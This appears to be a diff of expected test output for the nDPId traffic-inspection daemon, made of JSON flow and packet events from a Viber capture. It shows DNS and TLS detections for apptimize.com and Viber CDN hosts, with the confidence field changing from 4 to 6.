00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1527155639237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1527155639237,"pkt":"MAdNo1+nAA6OMNv9CABFAAFnW5VAAEARXIDAqAAPwKgAEQA19ZgBU\/qk\/WOBgAABAAkABAABBG1hcGkJYXBwdGltaXplA2NvbQAAAQABwAwABQABAAAKmgACwBHAEQABAAEAAAA7AAQ2RabiwBEAAQABAAAAOwAENrtbtsARAAEAAQAAADsABCLf10HAEQABAAEAAAA7AAQjoIExwBEAAQABAAAAOwAEI6WM3sARAAEAAQAAADsABCOitm\/AEQABAAEAAAA7AAQ2RVffwBEAAQABAAAAOwAENrpW+MARAAIAAQAAA2AAGQducy0xODgzCWF3c2Rucy00MwJjbwJ1awDAEQACAAEAAANgABcHbnMtMTEyOQlhd3NkbnMtMTMDb3JnAMARAAIAAQAAA2AAFgZucy02ODUJYXdzZG5zLTIxA25ldADAEQACAAEAAANgABMGbnMtNDczCWF3c2Rucy01OcAbwSgAAQABAAADYAAEzfvB2Q=="} -00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1527155639237,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.166.226"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1527155639237,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"mapi.apptimize.com","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.69.166.226"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155639240,"flow_last_seen":1527155639240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155639240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1527155639240,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639240,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8C6FAAEAGkTrAqAARNkWm4pB6Abv8W2quAAAAAKAC\/\/9PrwAAAgQFtAQCCAoAIWEPAAAAAAEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1527155639414,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155639414,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHpPMSQJ\/Ftqr6ASaN+BOQAAAgQFtAQCCApMsKWZACFhDwEDAwg="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1527155639417,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155639417,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0C6JAAEAGkUHAqAARNkWm4pB6Abv8W2qvTzEkCoAQAq0WDQAAAQEICgAhYTtMsKWZ"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155639240,"flow_last_seen":1527155639419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155639419,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"viber.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1527155639240,"flow_last_seen":1527155639594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5053,"flow_avg_l4_payload_len":561,"midstream":0,"thread_ts_msec":1527155639594,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36986,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","server_names":"*.apptimize.com,apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Organization Validation Secure Server CA","subjectDN":"C=US, ST=CA, L=Mountain View, O=Apptimize, Inc, OU=PremiumSSL Wildcard, CN=*.apptimize.com","alpn":"http\/1.1","fingerprint":"BC:4C:8F:EC:8B:7B:85:BD:54:61:8B:C0:7B:E7:A2:69:0B:F2:49:E5"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155640085,"flow_last_seen":1527155640085,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155640085,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1527155640085,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640085,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8sZJAAEAG60jAqAARNkWm4pB8Abt0c9BwAAAAAKAC\/\/9xAAAAAgQFtAQCCAoAIWHiAAAAAAEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1527155640261,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155640261,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAOYG9to2RabiwKgAEQG7kHz0FjHkdHPQcaASaN\/u9gAAAgQFtAQCCApMsKZsACFh4gEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1527155640264,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155640264,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0sZNAAEAG60\/AqAARNkWm4pB8Abt0c9Bx9BYx5YAQAq2DyQAAAQEICgAhYg9MsKZs"} -00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155640085,"flow_last_seen":1527155640275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155640275,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00860{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"viber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155640085,"flow_last_seen":1527155640452,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1628,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155640452,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.69.166.226","src_port":36988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mapi.apptimize.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1527155641574,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1527155641574,"pkt":"AA6OMNv9MAdNo1+nCABFAABBH3ZAAEARmcXAqAARwKgAD5IqADUALZxVyU0BAAABAAAAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAQ=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641574,"flow_last_seen":1527155641574,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155641574,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1527155641691,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1527155641691,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXEZAAEARXIvAqAAPwKgAEQA1kioAlzNhyU2BgAABAAUAAAAABW1lZGlhA2NkbgV2aWJlcgNjb20AAAEAAcAMAAUAAQAACsAAHg1kbzJneTJrd2FrOWsyCmNsb3VkZnJvbnQDbmV0AMAxAAEAAQAAADsABDbmXWDAMQABAAEAAAA7AAQ25l2mwDEAAQABAAAAOwAENuZdIsAxAAEAAQAAADsABDbmXaA="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155641691,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.96"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1527155641691,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"media.cdn.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.96"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641697,"flow_last_seen":1527155641697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641697,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1527155641697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641697,"pkt":"AA6OMNv9MAdNo1+nCABFAAA825FAAEAGCivAqAARNuZdYOCwAbu7GrjkAAAAAKAC\/\/84\/wAAAgQFtAQCCAoAIWN1AAAAAAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1527155641714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641714,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMbw25l1gwKgAEQG74LAWDyy+uxq45aAScSCWXAAAAgQFtAQCCAp+anA4ACFjdQEDAwg="} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1527155641716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641716,"pkt":"AA6OMNv9MAdNo1+nCABFAAA025JAAEAGCjLAqAARNuZdYOCwAbu7GrjlFg8sv4AQAq0zmAAAAQEICgAhY3p+anA4"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 